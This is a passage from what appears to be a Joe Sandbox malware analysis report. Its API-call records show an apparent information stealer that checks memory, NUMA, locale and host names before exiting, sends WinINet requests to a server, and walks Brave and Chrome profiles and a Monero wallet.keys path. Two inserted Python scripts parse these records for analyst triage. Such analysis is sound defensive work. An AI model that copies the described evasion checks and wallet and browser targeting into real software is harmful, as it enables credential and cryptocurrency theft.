                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                       • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: f0c2ea975c7809312d4ecc0a99e1ed8b6f7c5707e7f3f29483020e1a5e624b55
                      • Instruction ID: c86c5ed664a4b292961808e48201069c8dd12d068c3612c546b36204b14078f6
                      • Opcode Fuzzy Hash: f0c2ea975c7809312d4ecc0a99e1ed8b6f7c5707e7f3f29483020e1a5e624b55
                      • Instruction Fuzzy Hash: 07F08CB0A44219EFE700BBA0DC0ABBE7B74FB05701F208914F517E11C1CBB85980EAA7
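
                       Added example (not Joe Sandbox output and not code from the analysed sample): a small Python parser for the "APIs" lines used throughout these function records, run over a constructed input assembled from the records above. It flags the call chains an analyst would look at first when triaging this report: GlobalMemoryStatusEx followed by ExitProcess (the memory-size check at 00731220), the OpenEventA/CreateEventA pair with its Sleep(00001770) loop (00746ABA), the GetUserDefaultLangID query reached through subcall 00746770, and the StrCmpCA against the literal "block" followed by ExitProcess (007417C5/007417D1). The rule names and the meaning attached to each chain are assumptions of this example; the report itself only lists the calls.

```python
"""Parse the "APIs" lines of a Joe Sandbox function record and flag
evasion-related call chains. Added example; not Joe Sandbox code and not
part of the analysed sample. Rule interpretations are assumptions."""
import re

# Constructed sample in the shape of the report's "APIs" blocks (direct
# calls and indented "Part of subcall function" lines), copied from the
# function records on this page.
SAMPLE_APIS = """\
• GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0073123E
• __aulldiv.LIBCMT ref: 00731258
• __aulldiv.LIBCMT ref: 00731266
• ExitProcess.KERNEL32 ref: 00731294
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013E8880), ref: 00746ACA
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00746AE8
• CloseHandle.KERNEL32(00000000), ref: 00746AF9
• Sleep.KERNEL32(00001770), ref: 00746B04
  • Part of subcall function 00746770: GetUserDefaultLangID.KERNEL32 ref: 00746774
• StrCmpCA.SHLWAPI(00000000,block), ref: 007417C5
• ExitProcess.KERNEL32 ref: 007417D1
"""

_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_api_lines(text):
    """One dict per API line: api, module, args (printed values, as-is),
    ref (call-site address as int) and subcall (hex string or None).
    Non-API lines such as section headings are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),
        })
    return calls


def sleep_durations_ms(calls):
    """Decode Sleep's first argument (printed in hex) to milliseconds.
    A '?' argument means the sandbox could not resolve the value."""
    out = []
    for c in calls:
        if c["api"] == "Sleep" and c["args"]:
            try:
                out.append(int(c["args"][0], 16))
            except ValueError:
                pass
    return out


def has_chain(calls, chain):
    """True if the (api, predicate) pairs in `chain` are matched by calls
    in listing order, not necessarily adjacent. predicate may be None."""
    want = list(chain)
    if not want:
        return True
    for c in calls:
        name, pred = want[0]
        if c["api"] == name and (pred is None or pred(c)):
            want.pop(0)
            if not want:
                return True
    return False


# Interpretations in parentheses are this example's assumptions.
RULES = [
    ("GlobalMemoryStatusEx then ExitProcess (RAM-size sandbox check)",
     [("GlobalMemoryStatusEx", None), ("ExitProcess", None)]),
    ("OpenEventA/CreateEventA on a named event (single-instance wait)",
     [("OpenEventA", None), ("CreateEventA", None)]),
    ("GetUserDefaultLangID reachable (locale-based evasion)",
     [("GetUserDefaultLangID", None)]),
    ("StrCmpCA against 'block' then ExitProcess (remote kill switch)",
     [("StrCmpCA", lambda c: "block" in c["args"]), ("ExitProcess", None)]),
]


def triage(text):
    """Summarise one record: call count, modules, decoded Sleep values
    and the names of every rule whose chain is present."""
    calls = parse_api_lines(text)
    return {
        "calls": len(calls),
        "modules": sorted({c["module"] for c in calls}),
        "sleeps_ms": sleep_durations_ms(calls),
        "flags": [name for name, chain in RULES if has_chain(calls, chain)],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_APIS), indent=2))
```

Feed each record's "APIs" block, including its indented "Part of subcall function" lines, to triage(). The Sleep decoding turns the printed 00001770 into 6000 ms and 0000EA60 into 60000 ms, the two values visible at 00746B04 and 00745A1B; has_chain matches on listing order only, so use the control-flow graph above a record when the question is whether a call sits on a loop or an exit path.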

                      Control-flow Graph

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                       • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1274457161-4251816714
                      • Opcode ID: 3a175b66728ee72e08d7072871f6293edc1fd7cd42980b682a81dc5e8a75eb6c
                      • Instruction ID: 2200e5ba22b6d9a34b3ae86e21f42fcb8ea334f1d8e69eb0445efbb22f70398d
                      • Opcode Fuzzy Hash: 3a175b66728ee72e08d7072871f6293edc1fd7cd42980b682a81dc5e8a75eb6c
                      • Instruction Fuzzy Hash: 17216FB1D00208ABEF14DFA4EC49ADE7B75FB44320F108625F925A72D1EB706A09CF81

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 00736280: InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
                        • Part of subcall function 00736280: StrCmpCA.SHLWAPI(?,013EE290), ref: 00736303
                        • Part of subcall function 00736280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
                        • Part of subcall function 00736280: HttpOpenRequestA.WININET(00000000,GET,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00736385
                        • Part of subcall function 00736280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
                        • Part of subcall function 00736280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                       • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: 941948efc345206a08c1cff89e998171204a1fd37d07f9437dc1ed2adf30b0b2
                      • Instruction ID: 55f0343d3ab0633f3c8879b8e0510179efe92ed3a876b5dff0e89ad16d8747e0
                      • Opcode Fuzzy Hash: 941948efc345206a08c1cff89e998171204a1fd37d07f9437dc1ed2adf30b0b2
                      • Instruction Fuzzy Hash: 50113070954108FBEB14FF60DD5AAED7378AF50300F808168F81A4B593EF78AB05CA92

                      Control-flow Graph (basic blocks and edges recovered from the graph image)
                      • 7478e0-747937: GetProcessHeap, RtlAllocateHeap, GetComputerNameA
                      • 7478e0-747937 → 747939-74793e
                      • 7478e0-747937 → 747942-747945
                      • 747939-74793e → 747962-747972
                      • 747942-747945 → 747962-747972
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00747917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      • API String ID: 1664310425-0
                      • Opcode ID: ee6799184f4c620852192f5ce842fb059cabfd293b4a98872a55dce56dbe9be5
                      • Instruction ID: 4bf99e4a2162ace0dee3c91cc3f3181fdbd530fd35d86be21e1fcf2fccb23127
                      • Opcode Fuzzy Hash: ee6799184f4c620852192f5ce842fb059cabfd293b4a98872a55dce56dbe9be5
                      • Instruction Fuzzy Hash: 6001A9B1A48204EFC714DF94DD45BAEBBB8F744B11F104259F945E3380D3785944CBA2
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0073112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00731132
                      • ExitProcess.KERNEL32 ref: 00731143
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: fda138dc8707a486fb32e22746b73f1118ac211c58c3760a706bf05db238c3a5
                      • Instruction ID: ea235291968408c753d9373cbc1c96bf51099d91a7eed52d787dfea0e9e7e105
                      • Opcode Fuzzy Hash: fda138dc8707a486fb32e22746b73f1118ac211c58c3760a706bf05db238c3a5
                      • Instruction Fuzzy Hash: 14E0867195930CFBE7106BA09C0EB4C7778AB44B02F500054F70C761C0D6B42640A69A
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007310B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007310F7
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: d625f88cb338b0e32b874752f0ca6a835f6f103f0e64fc7180995d2c56493058
                      • Instruction ID: c21fa98171918094cad8016ab14d074fa3b0d03eebcf23f4c5cd87ca699471cc
                      • Opcode Fuzzy Hash: d625f88cb338b0e32b874752f0ca6a835f6f103f0e64fc7180995d2c56493058
                      • Instruction Fuzzy Hash: 30F0E2B2641208FBE7189AA4AC49FAEB7ECE705B15F300448F504E7280D571AE40DAA1
                      APIs
                        • Part of subcall function 007478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747910
                        • Part of subcall function 007478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00747917
                        • Part of subcall function 007478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F
                        • Part of subcall function 00747850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
                        • Part of subcall function 00747850: RtlAllocateHeap.NTDLL(00000000), ref: 00747887
                        • Part of subcall function 00747850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F
                      • ExitProcess.KERNEL32 ref: 007311C6
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 29d404c84d5288b336439603b5cedf0540cbff16636f3dba6913340b9f982ed1
                      • Instruction ID: cc56c7f43beac40c48351313e904d24f80696370b8b7b40c6f2c10549534b698
                      • Opcode Fuzzy Hash: 29d404c84d5288b336439603b5cedf0540cbff16636f3dba6913340b9f982ed1
                      • Instruction Fuzzy Hash: 38E012B6A2830993DA0477B0EC0EB2E339C5B54746F440824FA09D2113FF6DE840D666
                      APIs
                      • wsprintfA.USER32 ref: 007438CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 007438E3
                      • lstrcat.KERNEL32(?,?), ref: 00743935
                      • StrCmpCA.SHLWAPI(?,00750F70), ref: 00743947
                      • StrCmpCA.SHLWAPI(?,00750F74), ref: 0074395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00743C67
                      • FindClose.KERNEL32(000000FF), ref: 00743C7C
                      Strings
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: 9116b213d313c2d223666281bb029c771610dfb129d70c1ee53501bdd556cc11
                      • Instruction ID: cc1e202cf208ec8730f0801b544ecf1d5a01fede34e81c68acf36c938e360b1d
                      • Opcode Fuzzy Hash: 9116b213d313c2d223666281bb029c771610dfb129d70c1ee53501bdd556cc11
                      • Instruction Fuzzy Hash: B7A124B2A14218ABDB24DF64DC89FEE7378FF84301F444588B61D96181EB759B84CF62
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00750B32,00750B2B,00000000,?,?,?,007513F4,00750B2A), ref: 0073BEF5
                      • StrCmpCA.SHLWAPI(?,007513F8), ref: 0073BF4D
                      • StrCmpCA.SHLWAPI(?,007513FC), ref: 0073BF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073C7BF
                      • FindClose.KERNEL32(000000FF), ref: 0073C7D1
                      Strings
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: 3be231c742ed8a46bcf7167ab16ac42528d248c3020e47ccef67d364d070268e
                      • Instruction ID: 5a89ec39a60c5ad6776aae47721bd1272b8d6176c4b16b93317c896cdd100e9f
                      • Opcode Fuzzy Hash: 3be231c742ed8a46bcf7167ab16ac42528d248c3020e47ccef67d364d070268e
                      • Instruction Fuzzy Hash: E6425772950104F7EB15FB70DD9AEED737DAF94300F404568B90AA6181EF38AB49CB92
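The API bullet lists above are the most useful part of these function records for triage: they show the WinINet request setup (HttpOpenRequestA flags 00400100, InternetSetOptionA option 0000001F), a VirtualAllocExNuma call and a 17C841C0-byte VirtualAlloc/VirtualFree pair each sitting in a function that can reach ExitProcess, GetComputerNameA/GetUserNameA collection ahead of another ExitProcess, and resolved path arguments such as \Monero\wallet.keys. The script below is an added example, not part of the Joe Sandbox report or its plugin: it parses those bullet lines exactly as printed, decodes the Win32 flag values against SDK constants, and flags the call chains a practitioner would treat as evasion checks. The input blocks are copied from the listing above and grouped per function; the block labels and rule wording are the script's own, and reading the five stack values printed at GetCurrentProcess as the arguments already pushed for the following VirtualAllocExNuma is an assumption. The listing shows which calls a function contains, not the branch conditions between them, so the script reports chains and leaves the interpretation to the analyst.

```python
"""Parse Joe Sandbox 'APIs' bullet lines, decode Win32 flag arguments, and flag
evasion-style call chains. Added example; labels and rule text are the script's own."""
import re
from collections import namedtuple

API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]{6,8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{6,8})\s*$")

# Win32 constants as defined in the Windows SDK headers.
MEM = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
INET_FLAGS = {0x100: "INTERNET_FLAG_PRAGMA_NOCACHE", 0x200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
              0x400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x800000: "INTERNET_FLAG_SECURE",
              0x4000000: "INTERNET_FLAG_NO_CACHE_WRITE", 0x80000000: "INTERNET_FLAG_RELOAD"}
INET_OPTIONS = {0x02: "INTERNET_OPTION_CONNECT_TIMEOUT", 0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}

# args keeps the stack values exactly as printed: hex, '?', or a resolved string.
Call = namedtuple("Call", "api module args ref callee")

def parse_apis(text):
    """One function's 'APIs' list -> Call records; lines that are not API bullets are skipped."""
    calls = []
    for line in text.splitlines():
        if m := API_LINE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["module"].upper(), args, int(m["ref"], 16), m["callee"]))
    return calls

def hexarg(call, i):
    """Stack value i as int; None for '?', resolved strings, or a missing slot."""
    if i < len(call.args) and re.fullmatch(r"[0-9A-Fa-f]{1,8}", call.args[i]):
        return int(call.args[i], 16)
    return None

def decode(value, table):
    """Bitmask -> 'NAME|NAME|0x...' using the given constant table."""
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"

def analyse(calls):
    """Rules over one function's calls -> (findings, backslash paths seen as arguments)."""
    names = [c.api for c in calls]
    findings = []
    # 1. VirtualAllocExNuma with ExitProcess in the same function. The values printed at
    #    GetCurrentProcess are read (assumption) as the pending allocation's arguments:
    #    lpAddress, dwSize, flAllocationType, flProtect, nndPreferred.
    if "VirtualAllocExNuma" in names and "ExitProcess" in names:
        gcp = next((c for c in calls if c.api == "GetCurrentProcess"), None)
        detail = ""
        if gcp and all(hexarg(gcp, i) is not None for i in range(1, 5)):
            detail = (f" size=0x{hexarg(gcp, 1):x} {decode(hexarg(gcp, 2), MEM)} "
                      f"{decode(hexarg(gcp, 3), PAGE)} node={hexarg(gcp, 4)}")
        findings.append("VirtualAllocExNuma then ExitProcess" + detail)
    # 2. A very large VirtualAlloc that is released again in the same function.
    for c in calls:
        if c.api == "VirtualAlloc" and (size := hexarg(c, 1)) and size >= 256 << 20:
            released = any(f.api == "VirtualFree" and hexarg(f, 1) == size for f in calls)
            findings.append(f"VirtualAlloc {size >> 20} MiB {decode(hexarg(c, 2), MEM)} "
                            f"{decode(hexarg(c, 3), PAGE)}" + (", then VirtualFree of the same size" if released else ""))
    # 3. Computer/user name collection in a function that also reaches ExitProcess.
    probes = [n for n in names if n in ("GetComputerNameA", "GetComputerNameW", "GetUserNameA", "GetUserNameW")]
    if probes and "ExitProcess" in names:
        findings.append("host identity check with ExitProcess path: " + ", ".join(probes))
    # 4. WinINet request setup: decode HttpOpenRequest dwFlags and InternetSetOption dwOption.
    for c in calls:
        if c.api.startswith("HttpOpenRequest") and hexarg(c, 6) is not None:
            findings.append(f"HttpOpenRequest {c.args[1]} flags={decode(hexarg(c, 6), INET_FLAGS)}")
        if c.api.startswith("InternetSetOption") and (opt := hexarg(c, 1)) is not None:
            findings.append(f"InternetSetOption {INET_OPTIONS.get(opt, hex(opt))} ({hexarg(c, 3)} bytes)")
    targets = sorted({a for c in calls for a in c.args if a.startswith("\\")})
    return findings, targets

# Constructed input: bullet lines copied from the listing above, grouped per function.
SAMPLE_BLOCKS = {
    "c2_request": """
• Part of subcall function 00736280: HttpOpenRequestA.WININET(00000000,GET,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00736385
• Part of subcall function 00736280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745228
""",
    "numa_probe": """
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0073112B
• VirtualAllocExNuma.KERNEL32(00000000), ref: 00731132
• ExitProcess.KERNEL32 ref: 00731143
""",
    "memory_probe": """
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007310B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007310F7
""",
    "host_check": """
• Part of subcall function 007478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F
• Part of subcall function 00747850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F
• ExitProcess.KERNEL32 ref: 007311C6
""",
    "wallet_walk": """
• Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\\Monero\\wallet.keys,00750E17), ref: 0074A9C5
• FindFirstFileA.KERNEL32(00000000,?,00750B32,00750B2B,00000000,?,?,?,007513F4,00750B2A), ref: 0073BEF5
""",
}

def analyse_report(blocks=SAMPLE_BLOCKS):
    """label -> (findings, targets) for every function block."""
    return {label: analyse(parse_apis(text)) for label, text in blocks.items()}
```

Run against the copied blocks, `analyse_report()` reports the 0x7D0-byte MEM_COMMIT|MEM_RESERVE PAGE_EXECUTE_READWRITE NUMA allocation paired with ExitProcess, a 380 MiB PAGE_READWRITE allocation released straight back with MEM_RELEASE, the GetComputerNameA/GetUserNameA pair ahead of ExitProcess, a GET request opened with INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION followed by a 4-byte INTERNET_OPTION_SECURITY_FLAGS write, and \Monero\wallet.keys as a file-system target. Values Joe prints as `?` are left undecoded rather than guessed, and a resolved string that happens to consist only of hex digits would be misread as a number, which is why the parser keeps the raw argument text alongside.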
                      APIs
                      • wsprintfA.USER32 ref: 0074492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 00744943
                      • StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
                      • StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
                      • FindClose.KERNEL32(000000FF), ref: 00744B92
                      Strings
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*
                      • API String ID: 180737720-445461498
                      • Opcode ID: dff5af834e2e3645a4c380bbe05a850f2d0c0840ffa1091b9a226f5569c48ded
                      • Instruction ID: 2311530cd7f3242952efb01b886909b6d6666fd765cf0b6a47f5ad3c9535c3e4
                      • Opcode Fuzzy Hash: dff5af834e2e3645a4c380bbe05a850f2d0c0840ffa1091b9a226f5569c48ded
                      • Instruction Fuzzy Hash: FE6148B2914218ABCB24EBA0DC49FEE737CBB88701F044588B50D96141EB75EB85DF91
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00744580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00744587
                      • wsprintfA.USER32 ref: 007445A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 007445BD
                      • StrCmpCA.SHLWAPI(?,00750FC4), ref: 007445EB
                      • StrCmpCA.SHLWAPI(?,00750FC8), ref: 00744601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0074468B
                      • FindClose.KERNEL32(000000FF), ref: 007446A0
                      • lstrcat.KERNEL32(?,013EE310), ref: 007446C5
                      • lstrcat.KERNEL32(?,013ED5B8), ref: 007446D8
                      • lstrlen.KERNEL32(?), ref: 007446E5
                      • lstrlen.KERNEL32(?), ref: 007446F6
                      Strings
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*
                      • API String ID: 671575355-2848263008
                      • Opcode ID: 261d3c6892ead980f87c37c67f7dbd465828ababd1ff7b8e4fb06ff9a8112e74
                      • Instruction ID: bc1a7e68fa6e2b7b0b4e8871f20ffa9fa5ea572f95fec94c85e5096bb40e766b
                      • Opcode Fuzzy Hash: 261d3c6892ead980f87c37c67f7dbd465828ababd1ff7b8e4fb06ff9a8112e74
                      • Instruction Fuzzy Hash: EF5168B2954218ABCB64EB70DC89FED737CAB94300F404588F61D96191EB789BC4DF92
                      APIs
                      • wsprintfA.USER32 ref: 00743EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 00743EDA
                      • StrCmpCA.SHLWAPI(?,00750FAC), ref: 00743F08
                      • StrCmpCA.SHLWAPI(?,00750FB0), ref: 00743F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0074406C
                      • FindClose.KERNEL32(000000FF), ref: 00744081
                      Strings
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s
                      • API String ID: 180737720-4073750446
                      • Opcode ID: b7f79e1633e956341a90d92c4339554380333ff70c51b63e4443695a0e61d45c
                      • Instruction ID: 8f2ef8c6c3554a8a5a9394c48ebae0e6a2bd1cd05bcc65438d7ec523644f655e
                      • Opcode Fuzzy Hash: b7f79e1633e956341a90d92c4339554380333ff70c51b63e4443695a0e61d45c
                      • Instruction Fuzzy Hash: 7F514BB2914218EBCB24FBB0DC49EED737CBB94300F404588B65D96141DB79AB85DF91
                      APIs
                      • wsprintfA.USER32 ref: 0073ED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 0073ED55
                      • StrCmpCA.SHLWAPI(?,00751538), ref: 0073EDAB
                      • StrCmpCA.SHLWAPI(?,0075153C), ref: 0073EDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073F2AE
                      • FindClose.KERNEL32(000000FF), ref: 0073F2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
